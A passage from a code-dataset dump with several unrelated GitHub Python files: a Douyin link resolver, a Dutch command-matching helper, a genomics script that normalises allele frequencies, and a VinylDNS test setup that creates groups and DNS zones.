new_url.split(\"\\\"\")\n raw_url = str_array[1]\n\n return raw_url\n\n\ndef main():\n test_url = \"https://v.douyin.com/vqUNVw/\"\n\n raw_url = get_duyin_raw_url(test_url)\n print(raw_url)\n\n\nmain()\n","repo_name":"xvsdf100/douyintool","sub_path":"DuYinTool.py","file_name":"DuYinTool.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"16747903857","text":"def main(commando):\n commando = str(commando)\n commands = [\"ALLESONGTEKSTEN\", \"BOEK\", \"DATA\", \"FEITEN\", \"GAGILLEN\", \"LANDEN\", \"PAASDAG\", \"TEKENCORONA\", \"STOP\"]\n procentpercommand = []\n for command in commands:\n bijelkaar = 0\n letters = []\n aantalletters = 0\n if commando == command:\n return command\n for letter in commando:\n letters.append(letter)\n for letter in command:\n if letter in letters:\n bijelkaar = bijelkaar + 100\n else:\n bijelkaar = bijelkaar + 0\n aantalletters = aantalletters + 1\n procentuiteindelijk = bijelkaar / aantalletters\n procentpercommand.append(procentuiteindelijk)\n positie = 0\n hoogtsteprocent = max(procentpercommand)\n for procent in procentpercommand:\n if procent == hoogtsteprocent:\n break\n else:\n positie = positie + 1\n if hoogtsteprocent > 69:\n return commands[positie]\n else:\n return 'NIKS'","repo_name":"Abelkrijgtalles/parel-assistant","sub_path":"ai/procentcalculator.py","file_name":"procentcalculator.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"6009504606","text":"#!/usr/bin/env python3\n\nimport sys\nimport tempfile\nimport statistics\n#import numpy as np\nimport math\n\nclass Cpos_data(object):\n def __init__(self):\n self.freqs_mean = None\n self.freqs_sd = None\n self.counts_mean = None\n self.counts_sd = None\n self.freqsum = 0\n self.freqsum_sq = 0\n self.freqn = 0\n self.countsum = 0\n self.countsum_sq = 0\n self.countn = 0\n \n self.freqs_mean_het = None\n self.freqs_sd_het = None\n self.counts_mean_het = None\n self.counts_sd_het = None\n self.freqsum_het = 0\n self.freqsum_sq_het = 0\n self.freqn_het = 0\n self.countsum_het = 0\n self.countsum_sq_het = 0\n self.countn_het = 0\n \n self.freqs_mean_blood = None\n self.freqs_sd_blood = None\n self.counts_mean_blood = None\n self.counts_sd_blood = None\n self.freqsum_blood = 0\n self.freqsum_sq_blood = 0\n self.freqn_blood = 0\n self.countsum_blood = 0\n self.countsum_sq_blood = 0\n self.countn_blood = 0\n \n self.freqs_mean_het_blood = None\n self.freqs_sd_het_blood = None\n self.counts_mean_het_blood = None\n self.counts_sd_het_blood = None\n self.freqsum_het_blood = 0\n self.freqsum_sq_het_blood = 0\n self.freqn_het_blood = 0\n self.countsum_het_blood = 0\n self.countsum_sq_het_blood = 0\n self.countn_het_blood = 0\n def printme(self):\n print(self.freqsum, self.freqsum_sq, self.freqn, self.countsum, self.countsum_sq, self.countn, self.freqs_mean, self.freqs_sd, self.counts_mean, self.counts_sd, sep=\"\\n\")\n print(\"<======>\")\n def update_freqs(self, freq):\n if not freq == \"NA\":\n self.freqsum += freq\n self.freqsum_sq += (freq * freq)\n self.freqn += 1\n def update_freqs_het(self, freq):\n if not freq == \"NA\":\n self.freqsum_het += freq\n self.freqsum_sq_het += (freq * freq)\n self.freqn_het += 1\n def update_counts(self, count):\n if not count == \"NA\":\n self.countsum += count\n self.countsum_sq += (count * count)\n self.countn += 1\n def update_counts_het(self, count):\n if not count == \"NA\":\n self.countsum_het += count\n self.countsum_sq_het += (count * count)\n self.countn_het += 1\n def update_freqs_blood(self, freq):\n if not freq == \"NA\":\n self.freqsum_blood += freq\n self.freqsum_sq_blood += (freq * freq)\n self.freqn_blood += 1\n def update_freqs_het_blood(self, freq):\n if not freq == \"NA\":\n self.freqsum_het_blood += freq\n self.freqsum_sq_het_blood += (freq * freq)\n self.freqn_het_blood += 1\n def update_counts_blood(self, count):\n if not count == \"NA\":\n self.countsum_blood += count\n self.countsum_sq_blood += (count * count)\n self.countn_blood += 1\n def update_counts_het_blood(self, count):\n if not count == \"NA\":\n self.countsum_het_blood += count\n self.countsum_sq_het_blood += (count * count)\n self.countn_het_blood += 1\n def mean_sd(self):\n self.freqs_mean = meanit(self.freqsum, self.freqn)\n self.freqs_sd = sdit(self.freqsum, self.freqsum_sq, self.freqn)\n self.counts_mean = meanit(self.countsum, self.countn)\n self.counts_sd = sdit(self.countsum, self.countsum_sq, self.countn)\n self.freqs_mean_het = meanit(self.freqsum_het, self.freqn_het)\n self.freqs_sd_het = sdit(self.freqsum_het, self.freqsum_sq_het, self.freqn_het)\n self.counts_mean_het = meanit(self.countsum_het, self.countn_het)\n self.counts_sd_het = sdit(self.countsum_het, self.countsum_sq_het, self.countn_het)\n \n self.freqs_mean_blood = meanit(self.freqsum_blood, self.freqn_blood)\n self.freqs_sd_blood = sdit(self.freqsum_blood, self.freqsum_sq_blood, self.freqn_blood)\n self.counts_mean_blood = meanit(self.countsum_blood, self.countn_blood)\n self.counts_sd_blood = sdit(self.countsum_blood, self.countsum_sq_blood, self.countn_blood)\n self.freqs_mean_het_blood = meanit(self.freqsum_het_blood, self.freqn_het_blood)\n self.freqs_sd_het_blood = sdit(self.freqsum_het_blood, self.freqsum_sq_het_blood, self.freqn_het_blood)\n self.counts_mean_het_blood = meanit(self.countsum_het_blood, self.countn_het_blood)\n self.counts_sd_het_blood = sdit(self.countsum_het_blood, self.countsum_sq_het_blood, self.countn_het_blood)\n\ndef meanit(asum, n):\n out = \"NA\"\n if n>=1:\n out = asum / n\n return(out)\n\ndef sdit(asum, asum_sq, n):\n out = \"NA\"\n try:\n if n>= 2:\n out = math.sqrt( ((n * asum_sq) - (asum * asum)) / (n * (n-1)) )\n except ValueError:\n pass\n return(out)\n\ndef normalize(x, mean, sd):\n out = \"NA\"\n try:\n if sd > 0:\n out = (x-mean) / sd\n except TypeError:\n pass\n return(out)\n\ndef read_table():\n data = {}\n atemp = tempfile.TemporaryFile(mode=\"w+\")\n for i, l in enumerate(sys.stdin):\n if i==0:\n print(l.rstrip('\\n') + \"\\tfreq_mean\\tfreq_sd\\tcount_mean\\tcount_sd\\tfreq_mean_het\\tfreq_sd_het\\tcount_mean_het\\tcount_sd_het\\tfreq_mean_blood\\tfreq_sd_blood\\tcount_mean_blood\\tcount_sd_blood\\tfreq_mean_het_blood\\tfreq_sd_het_blood\\tcount_mean_het_blood\\tcount_sd_het_blood\\thet\\tfreq\\tfreq_nor\\tfreq_nor_het\\tcount_nor\\tcount_nor_het\\tfreq_nor_blood\\tfreq_nor_het_blood\\tcount_nor_blood\\tcount_nor_het_blood\")\n continue\n sl = l.rstrip('\\n').split('\\t')\n cpos = (sl[0], sl[1])\n hits = float(sl[-3])\n count = float(sl[-1])\n gt = sl[-4]\n het = False\n if len(gt) >= 3:\n if not gt[0] == gt[-1]:\n het = True\n blood = False\n if sl[5] == \"Blood\":\n blood = True\n if count > 0:\n freq = hits / count\n else:\n freq = \"NA\"\n if not cpos in data:\n data[cpos] = Cpos_data()\n data[cpos].update_freqs(freq)\n data[cpos].update_counts(count)\n if het:\n data[cpos].update_freqs_het(freq)\n data[cpos].update_counts_het(count)\n if blood:\n data[cpos].update_freqs_blood(freq)\n data[cpos].update_counts_blood(count)\n if het:\n data[cpos].update_freqs_het_blood(freq)\n data[cpos].update_counts_het_blood(count)\n atemp.write(l)\n return(data, atemp)\n\ndef calculate_means(data):\n for cpos, cpos_data in data.items():\n cpos_data.mean_sd()\n\ndef write_data(data, atemp):\n atemp.seek(0)\n for l in atemp:\n sl = l.rstrip('\\n').split('\\t')\n cpos = (sl[0], sl[1])\n cpos_data = data[cpos]\n hits = float(sl[-3])\n count = float(sl[-1])\n gt = sl[-4]\n het = False\n if len(gt) >= 3:\n if not gt[0] == gt[-1]:\n het = True\n if het:\n hetp = \"TRUE\"\n else:\n hetp = \"FALSE\"\n if count > 0:\n freq = hits / count\n else:\n freq = \"NA\"\n \n freq_nor = normalize(freq, cpos_data.freqs_mean, cpos_data.freqs_sd)\n freq_nor_het = normalize(freq, cpos_data.freqs_mean_het, cpos_data.freqs_sd_het)\n count_nor = normalize(count, cpos_data.counts_mean, cpos_data.counts_sd)\n count_nor_het = normalize(count, cpos_data.counts_mean_het, cpos_data.counts_sd_het)\n \n freq_nor_blood = normalize(freq, cpos_data.freqs_mean_blood, cpos_data.freqs_sd_blood)\n freq_nor_het_blood = normalize(freq, cpos_data.freqs_mean_het_blood, cpos_data.freqs_sd_het_blood)\n count_nor_blood = normalize(count, cpos_data.counts_mean_blood, cpos_data.counts_sd_blood)\n count_nor_het_blood = normalize(count, cpos_data.counts_mean_het_blood, cpos_data.counts_sd_het_blood)\n sl.append(cpos_data.freqs_mean)\n sl.append(cpos_data.freqs_sd)\n sl.append(cpos_data.counts_mean)\n sl.append(cpos_data.counts_sd)\n sl.append(cpos_data.freqs_mean_het)\n sl.append(cpos_data.freqs_sd_het)\n sl.append(cpos_data.counts_mean_het)\n sl.append(cpos_data.counts_sd_het)\n \n sl.append(cpos_data.freqs_mean_blood)\n sl.append(cpos_data.freqs_sd_blood)\n sl.append(cpos_data.counts_mean_blood)\n sl.append(cpos_data.counts_sd_blood)\n sl.append(cpos_data.freqs_mean_het_blood)\n sl.append(cpos_data.freqs_sd_het_blood)\n sl.append(cpos_data.counts_mean_het_blood)\n sl.append(cpos_data.counts_sd_het_blood)\n \n sl.append(hetp)\n sl.append(freq)\n sl.append(freq_nor)\n sl.append(freq_nor_het)\n sl.append(count_nor)\n sl.append(count_nor_het)\n sl.append(freq_nor_blood)\n sl.append(freq_nor_het_blood)\n sl.append(count_nor_blood)\n sl.append(count_nor_het_blood)\n print(\"\\t\".join(map(str, sl)))\n atemp.close()\n\ndef main():\n data, atemp = read_table()\n calculate_means(data)\n write_data(data, atemp)\n\nif __name__ == \"__main__\":\n main()\n\n#X\t101\t0.4\tA\tC\tBlood\tNA00001\t0\t100\t5\t105\n#X\t102\t0.4\tA\tG\tBlood\tNA00001\t0\t108\t5\t113\n#X\t103\t0.4\tGT\tTAT\tBlood\tNA00001\t0\t80\t5\t85\n#X\t101\t0.4\tA\tC\tBlood\tNA00002\t0/1\t50\t45\t95\n#X\t102\t0.4\tA\tG\tBlood\tNA00002\t0/1\t50\t45\t95\n#X\t103\t0.4\tGT\tTAT\tBlood\tNA00002\t0/1\t50\t45\t95\n#X\t101\t0.4\tA\tC\tSperm\tNA00003\t0|1\t10\t108\t118\n#X\t102\t0.4\tA\tG\tSperm\tNA00003\t0|1\t10\t108\t118\n#X\t103\t0.4\tGT\tTAT\tSperm\tNA00003\t0|1\t10\t108\t118\n#X\t101\t0.4\tA\tC\tSperm\tNA00004\t0|1\t55\t45\t100\n#X\t102\t0.4\tA\tG\tSperm\tNA00004\t0|1\t55\t45\t100\n#X\t103\t0.4\tGT\tTAT\tSperm\tNA00004\t0|1\t55\t45\t100\n","repo_name":"jgbaldwinbrown/jgbutils","sub_path":"Distortion_2019/vcf2table/getmeans.py","file_name":"getmeans.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"29457497499","text":"import copy\nimport inspect\nimport logging\nfrom typing import MutableMapping, Mapping\n\nfrom tests.list_batch_summaries_test_context import ListBatchChangeSummariesTestContext\nfrom tests.list_groups_test_context import ListGroupsTestContext\nfrom tests.list_recordsets_test_context import ListRecordSetsTestContext\nfrom tests.list_zones_test_context import ListZonesTestContext\nfrom tests.test_data import TestData\nfrom utils import *\nfrom vinyldns_python import VinylDNSClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass SharedZoneTestContext(object):\n \"\"\"\n Creates multiple zones to test authorization / access to shared zones across users\n \"\"\"\n _data_cache: MutableMapping[str, MutableMapping[str, Mapping]] = {}\n\n\n def __init__(self, partition_id: str):\n self.partition_id = partition_id\n self.setup_started = False\n self.ok_vinyldns_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"okAccessKey\", \"okSecretKey\")\n self.dummy_vinyldns_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"dummyAccessKey\", \"dummySecretKey\")\n self.shared_zone_vinyldns_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"sharedZoneUserAccessKey\", \"sharedZoneUserSecretKey\")\n self.support_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"supportUserAccessKey\", \"supportUserSecretKey\")\n self.super_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"superUserAccessKey\", \"superUserSecretKey\")\n self.unassociated_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"listGroupAccessKey\", \"listGroupSecretKey\")\n self.test_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"testUserAccessKey\", \"testUserSecretKey\")\n self.history_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"history-key\", \"history-secret\")\n self.non_user_client = VinylDNSClient(VinylDNSTestContext.vinyldns_url, \"not-exist-key\", \"not-exist-secret\")\n self.clients = [self.ok_vinyldns_client, self.dummy_vinyldns_client, self.shared_zone_vinyldns_client,\n self.support_user_client, self.super_user_client, self.unassociated_client,\n self.test_user_client, self.history_client, self.non_user_client]\n self.list_zones = ListZonesTestContext(partition_id)\n self.list_zones_client = self.list_zones.client\n self.list_records_context = ListRecordSetsTestContext(partition_id)\n self.list_groups_context = ListGroupsTestContext(partition_id)\n self.list_batch_summaries_context = ListBatchChangeSummariesTestContext(partition_id)\n\n self.dummy_group = None\n self.ok_group = None\n self.shared_record_group = None\n self.history_group = None\n self.group_activity_created = None\n self.group_activity_updated = None\n\n self.history_zone = None\n self.ok_zone = None\n self.dummy_zone = None\n self.ip6_reverse_zone = None\n self.ip6_16_nibble_zone = None\n self.ip4_reverse_zone = None\n self.classless_base_zone = None\n self.classless_zone_delegation_zone = None\n self.system_test_zone = None\n self.parent_zone = None\n self.ds_zone = None\n self.requires_review_zone = None\n self.shared_zone = None\n\n self.ip4_10_prefix = None\n self.ip4_classless_prefix = None\n self.ip6_prefix = None\n\n\n def setup(self):\n if self.setup_started:\n # Safeguard against reentrance\n return\n self.setup_started = True\n\n partition_id = self.partition_id\n try:\n ok_group = {\n \"name\": f\"ok-group{partition_id}\",\n \"email\": \"test@test.com\",\n \"description\": \"this is a description\",\n \"members\": [{\"id\": \"ok\"}, {\"id\": \"support-user-id\"}],\n \"admins\": [{\"id\": \"ok\"}]\n }\n\n self.ok_group = self.ok_vinyldns_client.create_group(ok_group, status=200)\n # in theory this shouldn\"t be needed, but getting \"user is not in group' errors on zone creation\n self.confirm_member_in_group(self.ok_vinyldns_client, self.ok_group)\n\n dummy_group = {\n \"name\": f\"dummy-group{partition_id}\",\n \"email\": \"test@test.com\",\n \"description\": \"this is a description\",\n \"members\": [{\"id\": \"dummy\"}],\n \"admins\": [{\"id\": \"dummy\"}]\n }\n self.dummy_group = self.dummy_vinyldns_client.create_group(dummy_group, status=200)\n # in theory this shouldn\"t be needed, but getting \"user is not in group' errors on zone creation\n self.confirm_member_in_group(self.dummy_vinyldns_client, self.dummy_group)\n\n shared_record_group = {\n \"name\": f\"record-ownergroup{partition_id}\",\n \"email\": \"test@test.com\",\n \"description\": \"this is a description\",\n \"members\": [{\"id\": \"sharedZoneUser\"}, {\"id\": \"ok\"}, {\"id\": \"support-user-id\"}],\n \"admins\": [{\"id\": \"sharedZoneUser\"}, {\"id\": \"ok\"}]\n }\n self.shared_record_group = self.ok_vinyldns_client.create_group(shared_record_group, status=200)\n\n history_group = {\n \"name\": f\"history-group{partition_id}\",\n \"email\": \"test@test.com\",\n \"description\": \"this is a description\",\n \"members\": [{\"id\": \"history-id\"}],\n \"admins\": [{\"id\": \"history-id\"}]\n }\n self.history_group = self.history_client.create_group(history_group, status=200)\n self.confirm_member_in_group(self.history_client, self.history_group)\n\n history_zone_change = self.history_client.create_zone(\n {\n \"name\": f\"system-test-history{partition_id}.\",\n \"email\": \"i.changed.this.1.times@history-test.com\",\n \"shared\": False,\n \"adminGroupId\": self.history_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"vinyldns.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"vinyldns.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.history_zone = history_zone_change[\"zone\"]\n\n # initialize history\n self.history_client.wait_until_zone_active(history_zone_change[\"zone\"][\"id\"])\n self.init_history()\n\n ok_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"ok{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"ok.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"ok.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.ok_zone = ok_zone_change[\"zone\"]\n\n dummy_zone_change = self.dummy_vinyldns_client.create_zone(\n {\n \"name\": f\"dummy{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.dummy_group[\"id\"],\n \"isTest\": True,\n \"acl\": {\n \"rules\": [\n {\n \"accessLevel\": \"Delete\",\n \"description\": \"some_test_rule\",\n \"userId\": \"history-id\"\n }\n ]\n },\n \"connection\": {\n \"name\": \"dummy.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"dummy.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.dummy_zone = dummy_zone_change[\"zone\"]\n\n self.ip6_prefix = f\"fd69:27cc:fe9{partition_id}\"\n ip6_reverse_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"{partition_id}.9.e.f.c.c.7.2.9.6.d.f.ip6.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"ip6.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"ip6.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.ip6_reverse_zone = ip6_reverse_zone_change[\"zone\"]\n\n ip6_16_nibble_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"0.0.0.1.{partition_id}.9.e.f.c.c.7.2.9.6.d.f.ip6.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"backendId\": \"func-test-backend\"\n }, status=202\n )\n self.ip6_16_nibble_zone = ip6_16_nibble_zone_change[\"zone\"]\n\n self.ip4_10_prefix = f\"10.{partition_id}\"\n ip4_reverse_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"{partition_id}.10.in-addr.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"ip4.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"ip4.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.ip4_reverse_zone = ip4_reverse_zone_change[\"zone\"]\n\n self.ip4_classless_prefix = f\"192.0.{partition_id}\"\n classless_base_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"{partition_id}.0.192.in-addr.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"classless-base.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"classless-base.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.classless_base_zone = classless_base_zone_change[\"zone\"]\n\n classless_zone_delegation_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"192/30.{partition_id}.0.192.in-addr.arpa.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"classless.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"classless.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.classless_zone_delegation_zone = classless_zone_delegation_change[\"zone\"]\n\n system_test_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"system-test{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"system-test.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"system-test.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202\n )\n self.system_test_zone = system_test_zone_change[\"zone\"]\n\n # parent zone gives access to the dummy user, dummy user cannot manage ns records\n parent_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"parent.com{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"acl\": {\n \"rules\": [\n {\n \"accessLevel\": \"Delete\",\n \"description\": \"some_test_rule\",\n \"userId\": \"dummy\"\n }\n ]\n },\n \"connection\": {\n \"name\": \"parent.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"parent.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.parent_zone = parent_zone_change[\"zone\"]\n\n # mimicking the spec example\n ds_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"example.com{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"example.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"example.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.ds_zone = ds_zone_change[\"zone\"]\n\n # zone with name configured for manual review\n requires_review_zone_change = self.ok_vinyldns_client.create_zone(\n {\n \"name\": f\"zone.requires.review{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": False,\n \"adminGroupId\": self.ok_group[\"id\"],\n \"isTest\": True,\n \"backendId\": \"func-test-backend\"\n }, status=202)\n self.requires_review_zone = requires_review_zone_change[\"zone\"]\n\n # Shared zone\n shared_zone_change = self.support_user_client.create_zone(\n {\n \"name\": f\"shared{partition_id}.\",\n \"email\": \"test@test.com\",\n \"shared\": True,\n \"adminGroupId\": self.shared_record_group[\"id\"],\n \"isTest\": True,\n \"connection\": {\n \"name\": \"shared.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n },\n \"transferConnection\": {\n \"name\": \"shared.\",\n \"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.shared_zone = shared_zone_change[\"zone\"]\n\n # wait until our zones are created\n self.ok_vinyldns_client.wait_until_zone_active(system_test_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(ok_zone_change[\"zone\"][\"id\"])\n self.dummy_vinyldns_client.wait_until_zone_active(dummy_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(ip6_reverse_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(ip6_16_nibble_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(ip4_reverse_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(classless_base_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(classless_zone_delegation_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(system_test_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(parent_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(ds_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(requires_review_zone_change[\"zone\"][\"id\"])\n self.shared_zone_vinyldns_client.wait_until_zone_active(shared_zone_change[\"zone\"][\"id\"])\n\n # initialize group activity\n self.init_group_activity()\n\n # initialize list zones, only do this when constructing the whole!\n self.list_zones.setup()\n\n # note: there are no state to load, the tests only need the client\n self.list_zones_client = self.list_zones.client\n\n # build the list of records; note: we do need to save the test records\n self.list_records_context.setup()\n\n # build the list of groups\n self.list_groups_context.setup()\n except Exception:\n # Cleanup if setup fails\n self.tear_down()\n traceback.print_exc()\n raise\n\n def init_history(self):\n # Initialize the zone history\n # change the zone nine times to we have update events in zone change history,\n # ten total changes including creation\n for i in range(2, 11):\n zone_update = copy.deepcopy(self.history_zone)\n zone_update[\"connection\"][\"key\"] = VinylDNSTestContext.dns_key\n zone_update[\"transferConnection\"][\"key\"] = VinylDNSTestContext.dns_key\n zone_update[\"email\"] = \"i.changed.this.{0}.times@history-test.com\".format(i)\n self.history_client.update_zone(zone_update, status=202)\n\n # create some record sets\n test_a = TestData.A.copy()\n test_a[\"zoneId\"] = self.history_zone[\"id\"]\n test_aaaa = TestData.AAAA.copy()\n test_aaaa[\"zoneId\"] = self.history_zone[\"id\"]\n test_cname = TestData.CNAME.copy()\n test_cname[\"zoneId\"] = self.history_zone[\"id\"]\n\n a_record = self.history_client.create_recordset(test_a, status=202)[\"recordSet\"]\n aaaa_record = self.history_client.create_recordset(test_aaaa, status=202)[\"recordSet\"]\n cname_record = self.history_client.create_recordset(test_cname, status=202)[\"recordSet\"]\n\n # wait here for all the record sets to be created\n self.history_client.wait_until_recordset_exists(a_record[\"zoneId\"], a_record[\"id\"])\n self.history_client.wait_until_recordset_exists(aaaa_record[\"zoneId\"], 